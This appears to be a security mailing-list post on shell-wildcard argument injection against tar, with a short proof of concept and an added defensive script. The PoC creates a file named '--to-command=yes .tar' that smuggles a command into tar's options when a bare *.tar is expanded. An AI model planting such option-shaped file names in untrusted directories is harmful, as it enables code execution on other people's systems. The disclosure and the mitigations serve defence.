Shell wildcards considered dangerous?
Remote version of this affects wu-ftpd from 2003:
https://www.debian.org/security/2003/dsa-377
Summary: For a trusted command PROGRAM, executing
PROGRAM *.EXT
may lead to arbitrary code execution, e.g. for
PROGRAM=EXT=tar
The main idea is that wildcard expansion can add program options: a file whose name begins with "-" is passed to PROGRAM as an argument and parsed as an option rather than a file name.
Open problem:
Are popular programs other than tar vulnerable?
Since shell wildcard expansion is unlikely to change, should best practice
include not using a bare *.EXT in the shell?
Example exploit vector: running the program in an untrusted
directory.
Poc:
====
$ rm -rf /tmp/1 ; mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue
$ : > --to-command="yes .tar"
# setup done; the next command is the PoC. *.tar now expands to include
# the file name '--to-command=yes .tar', which tar parses as an option
$ tar xf *.tar
# output: ".tar" repeated, because tar runs "yes .tar" as the --to-command
====
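Added example, not part of the original post: a POSIX sh script that shows how *.tar expands in a directory containing an option-shaped file name, the ./*.EXT anchoring that keeps every argument from being parsed as an option, and a simple check a script can run before handing a glob to a trusted program. The directory and file names are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): why "PROGRAM *.EXT" is unsafe
# in an untrusted directory, and two cheap defences. Uses a temp directory.
set -eu

# Constructed fixture: one ordinary archive name plus a file whose name
# looks like a tar option. Only empty files are created; nothing is extracted.
setup_fixture() {
    dir=$(mktemp -d)
    : > "$dir/a.tar"
    : > "$dir/--to-command=yes .tar"
    echo "$dir"
}

# How the shell expands a bare *.tar: a name starting with '-' lands in the
# argument list and the program cannot tell it apart from a real option.
expand_unsafe() {
    ( cd "$1" && for f in *.tar; do printf '%s\n' "$f"; done )
}

# Defence 1: anchor the glob with ./ so every argument begins with './'.
# (Defence 2, where the program honours it: put '--' before the glob, e.g.
#  tar xf -- ./*.tar; GNU tar stops option parsing at '--'.)
expand_safe() {
    ( cd "$1" && for f in ./*.tar; do printf '%s\n' "$f"; done )
}

# Detection: list file names in a directory whose first character is '-'.
find_option_like_names() {
    ( cd "$1" && for f in -*; do [ -e "$f" ] && printf '%s\n' "$f"; done; true )
}

# Count expanded arguments that start with '-' (0 means the list is safe).
count_option_like() {
    n=0
    while IFS= read -r arg; do
        case $arg in -*) n=$((n + 1)) ;; esac
    done
    echo "$n"
}
```

Run expand_unsafe and expand_safe on the fixture directory and pipe each through count_option_like to see the difference: the bare glob yields one option-looking argument, the anchored glob none.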